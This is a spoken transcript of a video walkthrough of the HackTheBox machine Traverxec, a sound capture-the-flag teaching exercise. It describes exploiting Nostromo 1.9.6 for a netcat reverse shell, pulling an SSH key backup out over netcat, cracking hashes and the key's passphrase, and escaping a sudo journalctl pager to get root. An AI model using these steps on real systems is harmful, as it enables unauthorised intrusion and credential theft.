What's going on YouTube? Today we're going to do some offensive work. So in the previous videos we have been doing some blue team challenges, blue team videos. Today we're going to do a bit of offensive security, right? I'm going to use HackTheBox and I'm going to carry over where we left in the latest offensive video. So basically it was Pawn with Metasploit Track. So today we covered all of these machines in this track. Today I'm going to cover this machine, Traverxec. So basically, this is the machine of today. It's not supposed to be difficult, so let's get started. As with any offensive or CTF challenge, we start with the in-map scan. Today we have two open ports, 202 for SSH and 84 Hey HTTP. And it's actually obvious to see that the version or the web server used here, it's Nostromo, the version 1.9.6. Now Nostromo is the kind of web server that you can use for fast and reliable processing of web pages. It's faster than Apache, so that's why it's used to render web pages faster. But it has downsides, of course. Now the version 1.9.6 here, as it's noted, it has vulnerabilities. So how we learn this? Okay, if you navigate to the web page 10.10.10.165, here's the web page. And before we dig any deeper into the web page, the hidden directories, the vulnerabilities, any application weaknesses that may be found in here, it's worth looking first at the version of this instance of the web server. It's the faster method always. So let's see if it has vulnerabilities, or let's see if it's burnable and therefore it has exploits. So search exploit Nostromo. And as you can see here, a quick search reveals that Nostromo version 1.9.6 it has actually an exploit. And as you can see, we have three. One of them can be executed with Metasploit, and the other one can be actually executed manually. We're gonna cover both methods. So, okay, so cd HTTP. Okay, so I have downloaded the exploit. You can find the exploit by a quick search. So the first method is just type Nostromo 1.9.6 GitHub exploit. Let's see here. So CV 2019 16278 Nostro exploit. Exactly, this is the one. Although it's kind of different from the one I downloaded. You can download this one, or you can also, let's see which one I downloaded first. Let me check the code out. Yeah, this one. You can use this one as well. Typically, it's the same code across all accounts in GitHub. Or what you can do, you can just go back and download the exploit directly from the command line. As you can see here, we have the path. So if we just quick command here with search exploit, and we type -w maybe to reveal the full URL. As you can see here, the full URL is revealed. We can take this, and it's always recommended to take a look at the exploit before you go ahead and download it. So let's take a look. It's a Python exploit, and you supply the target URL, target IP, the target port supposed to be 80 unless it's run on a different port. You type the port down and the comment that you would like to execute. Okay, so here are three methods to download the exploit. Now alternatively, you can just run the exploit using Metasploit. So we're going to cover both. So for that purpose, let me split this right and left, and on that side we're going to run msf console on this side, we're going to ls up here, ls. This is the exploit cat exploit.py. Yeah. So if you just launch the exploit Python 2, as you can see, you have the usage. So you have -h, specify the host and port of the target, of course, and the command to run. Okay, so I think if I close this one and let me split the view and run the listener here, LVP 4545. On a new tab, we're going to run MSF console. All right. Okay, so what to do now? Python to exploit .py-h, the target IP address. Here it is. Target port, and then the command between single quotes. We're going to supply the command. In this case, it's very obvious that we want to achieve a reverse shell. So to do that, we're going to use netcut nc and the IP address of my machine. There you go. And the port that my listener is listening on, which happens to be 4545. And it's recommended if I launch the bash shell immediately after I get the session. So -e bin bash. The listener is running, so we are ready to execute. File home Kali line 31, missing parentheses. Yeah, it's supposed to be Python 2, that's why we got the error. So we're going to use Python 2 for that purpose. And what do we got in here? RC Nostromo observer, positional arguments. What are we missing? Okay, so dash, maybe you have to remove the -h. I just confused this with -host. I run this now. I'm supposed to receive the shell. Let's see here. So far, nothing. This is my no. I think I made a mistake. This is the IP of try hack me in your face. I think this is the HackTheBox IP address. So let me go back and re-execute. We received the shell now. Okay, now it's time to stabilize the shell. We're going to go to the notes, which you have if you are subscribed to the tier 2 channel membership, and I'm going to stabilize the shell. Save your time, copying the commands and pasting them easier. And lastly, we're going to type Control Z, and the last step is to respawn the stable shell. Okay, so we have the stable shell here. Who am I? ID. Okay, so no need for this tab anymore. We're going to keep this because I have a neat list of the IP addresses, the target IP and my IP address. I may need them later. So keep this here. And here we have the shell, data. I am the user data. Okay, so what to do next? Next is to, as you know, to conduct the privileged escalation. So for this challenge, the first thing that we're going to enumerate is to enumerate the web server directory. So we're going to cd var, and as you can see, we have the Nostromo directory. We're going to navigate there, and we have logs, icons, the docs, and the conf. Normally, the configuration files contain sensitive information if you are lucky. So if you cd to conf, we have two files, memes and configuration file. If we ls-la to reveal the hidden files, as you can see, we have one hidden file, the password. Let's take a look at the contents of this file. Cat and we got what seems to be a hash. Okay, it's very tempting to go ahead and crack the hash. Let's take that, and first try to identify what kind of hash is this. So in the next tab here, we have MSF console running. I'm gonna leave this here, and I'm gonna open a new tab and open hash identifier. Type in the hash and see what we got. So MD5 Unix. Okay, great. So it's always better to corroborate your findings with online tools or any other tools. So the output of the tools need to, be in harmony. So basically that's why we compare the output through many different tools. So online hash identifier. I have them in my notes, but I'm too lazy to extract them. So let's see what do we got in here. Hash analyzer, paste in the hash, analyze. Hash type unknown. Wow. Let's try this one. So possible algorithms: MD5 crypt, MD5 Unix. As you can see, we got this result using hash identifier that is pre-installed in kernel Linux, Cisco iOS, MD5, Cisco. So it's MD5. It's MD5 hash. Okay, now the next step is to crack this. So let's use hashcat crack modes. I want to find out what's the mode for MD5. So let's go to hashcat. Let's see here. Algorithms. Alright, so I think I have to go back and tune my Googling query. Hashcat examples node. Okay, so MD5. These MD5 contain salt. Ours doesn't contain salt. So we're going to scroll down. MD5 crypt. MD5 crypt. Yeah. So that's the mode we're looking for. It's 500. Okay. So now we're going to use a hashcat command, guys, to crack this hash and find what is the password in there. So we're going to go back and hashcat -a. Let's spawn the help menu. Okay. So we have already determined the hash, the mode we're going to use. We're going to use attack mode and -m. It is 500. The attack mode needs to be defined as well. So let's scroll down and see what are the available attack modes. These are the hash modes. Okay, attack mode. Straight combination. We're going to use straight, and pretty much that's it. And of course we're going to use the word list, so we need a word list in here. So basically let's say okay, ls, and then say nano hash, paste in the hash here, hashcat -a0 -m 500, and then we need to define the hash file, which is hash, and in the word list user share word lists. Okay, while this is running, let's get back to where we left. So this is a hash. Now the password that will be revealed out of this hash might work for SSH or might not, but we need to keep the password as a note, as we might need this later. All right. Other than that, what do we have? ls So we have, go back to conf, and we have the configuration file of the web server. Let's take a look at the configuration file and see if we can spot any weakness. So we start from here, main directory, server name, the server admin name, the root, we already know that, the index, the username of the web server, the location of the HT password and HT access, aliases, home dirs / home, and home dirs _ public _ ... What does that mean? Home dirs. That's the only thing that needs to be investigated here. So basically, in Nostromo, there is a way to make the home directory of the current user. In this case, let's reveal the users, cat etc passwd. So what are the users that have shell on this system? So we have David. As you can see, David has a shell on the system, and we can log in as David. Other than that, let's see, no login. All of these other users don't have login, of course, except the root. So we have two users, root and David. So by specifying home dirs or home directories as /home here, what do we mean by that? We mean that the user can access their home directory using the web, right? Using the web. So using the web browser here, we can somehow access the home directory of David. Okay, home dirs _ public _ ... Here is specifying a restriction that home /home, the only thing that can be read publicly under /home is public _ ... So this means that this subfolder, okay, of the main directory home is accessible by everyone, including data. If it cannot be accessed through the web browser, it can be accessed through the command line. That's the purpose of home dirs in Nostromo. The ability to let you access your home directory from your browser. So how to do that? We have to use the simple and David. If we try, as you can see, we received this private space, nothing here, keep out. Normally, by specifying this configuration, okay, we're supposed to be able to access David, but that's what we get. Now, that's why we have to resort to the command line. So we know that this subfolder under home, okay, is accessible by everyone. So if we cd to home, examine what do we have. We have David here. And as you can see, only the owner of the David directory is able to access, is able to read, write, and execute. We as data can only execute. So we cannot access David. If you try to cd to David now, you cannot. ls-la, permission denied, right? Okay, so, but we already know from the configuration here that we have a subfolder under home where we can access it. So we have to guess. If we go back and say cd David /public, as you can see, we are able to access this area because it's specified to be accessed here as using the home dirs public. If this wasn't specified, I wouldn't have been able to access this subfolder. Bear this in mind. So ls-la, what do we have in here? We have index and we have protected file area. If we take a look at the permissions, as you can see, we can read the contents of this directory. So let's see, cd there. And as you can see, we have the AHT access and we have backup SSH identify files. So this is the backup of the SSH directory. It's supposed to hold the private key. So let's import this to my machine or download this to my machine. How to do that? You can use netcut, okay, to download this to your machine. So here you can specify this command, nc-lvb, a new listener, use a port that's different from the port you are using for this session. Here we have used 4545. It's wise to use another port 4546 for example, and then redirect any incoming traffic on this port to be stored as a file. The file name should be the same as the file name that we are trying to download. That's from the attacker machine side. I'm going to execute this because I have already downloaded the file. Now we're going to execute the command on the attacker side. NC, and then you put in the IP address of your machine. Type is to be 10, 10, 14, 20, the port 4546. Yes. Wait. NC 10, 10, 14, 20, 4546, and use this arrow here. This is input. What we're going to input to this connection is this file. Okay, paste this in, and you will paste this in, of course, execute the command on the victim side after you execute the command on the attacker side. So this one goes first, and then this one goes next. Okay, as I said earlier, I'm going to execute this because I have already did that. So we're supposed to receive this file. Let's take a look at the file. This is the file. Now, if we untar this file, we receive home. cd home, cd david, cd.sh, ls-a, and as you can see, we got the private key. Let's take a look at what happened here. Not enough allocatable device memory for this attack. We're going to leave this for the end because normally brute force takes the most time and resources. Let's get back here. As far as until this moment, we are progressing through this challenge, so no need to crack this hash unless we get into a rabbit hole. So now we have a private key. Let's start to log in with this private key. SSH dash, yeah, this is the command. Specifying a private key and the username and the IP address. Now the password. What's the password? We don't know the password, so we have to find the password. So obviously this private key here is protected through a password. What we're going to do, we're going to use SSH to John to convert this private key into a hash, and then crack the hash using John the Ripper. Obviously we'll get the password. So SSH to John, yeah. So the first command here converts this private key into a hash, and then we crack this using John the Ripper using the wordless raw queue. So because I have done this before, I'm going only to use the dash show to reveal the passwords. Dash show. As you can see, Hunter is the password. Let's go back and connect. Okay, seems like we're gonna spend the rest of my life looking for the command. So I found it. Connect. Hunter. Password is wrong. Hunter. Wait. Now we are connected as David ID. So David. Okay, cd home. Finally getting access to the home directory of this user. So here you go, user flag, and this is the subfolder that were specified or mentioned in the configuration file of the whatever it is, the web server. Okay, we have an interesting directory here, cd, or let's say cd to bin. So cd to bin, we have two files, server stats and server stats sh. So cat server stats bash script. Let's take a look. Cat home David bin server. So we display this file first, load user bin uptime, and then the sockets, files, and doc root, last five journal log lines. So it seems like a script that logs the statistics of the uptime and downtime of the server to a file, to the server stats.head file. And lastly, what it does, user bin sudo user bin journal ctl -n5 -u Nostromo servers user bin cat. So as you can see here, user David is supposed to be in the sudo group, judging by this line. So it's executing. If you take a look at the script here, ls-array one more time, so it's executed as David. So if David is able to execute journal ctl as sudo, it means David is within the sudo words group. If David is within the sudo words group, it means we can do privileged actions as David. So this is a plus for privileged escalation. Now let's execute this command alone, see what's the output. Starting Nostromo server, Nostromo service cannot open PID, started. So starting on the server, as you can see here, it's using less tool to display the lines. If you type Q, we can exit. Okay, so journalctl here is using list, list as a pager to go through the output. So a combination of sudo, okay, and journalctl will make us tempted to look for a way to abuse journalctl. So if you go to GTFO bins, it is the place where we go to for abusing binaries. GTFO bins. So we have a binary journalctl that can be run as sudo. Let's take a look at how we can abuse this. So journalctl shell sudo. Click on sudo. So we have two methods. This invokes the default pager, which is likely to be less. Exactly. That's the pager here. It's less. Other functions may apply. This might not work if run by unprivileged users, depending on the system configuration. As you can see here, user David is controlling or running the script, and judging by the output of the script, as you can see here, David is able to sudo or run journalctl as sudo. So all conditions are satisfied. Shell and sudo. Let's take a look at sudo here. If the binary is allowed to run as superuser by sudo, which it is in our case, it doesn't drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. So this means that if journalctl here is run as sudo, where is it? Here. Can be run as sudo, which it is, right? Which it can. It means we can elevate the privileges. But how? Let's see how. So sudo journalctl and then !bin/sh. So all you have to do here is to run this. But we're going to run this as in the context of the script. So we're going to take this line and rerun this line again. And at the end, we're going to execute !bin/bin/sh. Bin or bash sh, doesn't matter. As you can see, we get a shell. So what's the user ID? And it's the root user. So it seems like the challenge is finished, right? Let's go to the Metasploit now and see what's the other way of achieving the first shell. So search, type, exploit, name, Nostromo. And indeed, we get one. Copy, use. Oh, show options. So lhost. Here it is. 10, 10, 14, 20. And here we go to the rhost. So the rhost is 10, 10, 10, 167. Am I right? 65. Exploit. That's it. And as you can see, we get one command shell session open ID. Still yet to receive the session. Exactly. Double data. Now this is how you achieve the first shell with Metasploit and manually. So that's it for today, guys. I hope you like this, and I will see you in the next video.